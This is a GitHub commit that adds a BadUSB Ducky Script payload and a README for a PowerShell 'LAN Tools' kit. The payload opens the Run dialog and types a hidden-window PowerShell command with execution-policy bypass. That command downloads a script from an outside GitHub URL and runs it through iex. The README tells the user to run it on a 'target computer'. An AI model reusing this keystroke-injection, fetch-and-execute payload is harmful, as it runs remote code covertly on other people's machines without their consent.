Add files via upload

This commit is contained in:
egieb
2023-12-29 15:23:21 +00:00
committed by GitHub
parent c2549dc60e
commit 2efb3d2a2a
98 changed files with 4292 additions and 0 deletions
+15
View File
@@ -0,0 +1,15 @@
REM Title: beigeworm's LAN Tools
REM Author: @beigeworm
REM Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
REM NOTE - This script will need Admin privileges to run properly.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex
ENTER
+17
View File
@@ -0,0 +1,17 @@
<h2 align="center"> Beigeworm's Powershell LAN Toolset </h2>
MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN
SYNOPSIS
Start up a HTTP server and run a selection of Local Area Network Tools using Powershell.
USAGE
1. Run this script on target computer and note the URL provided
2. on another device on the same network, enter the provided URL in a browser window
NOTE
This script will need Admin privaleges to run properly.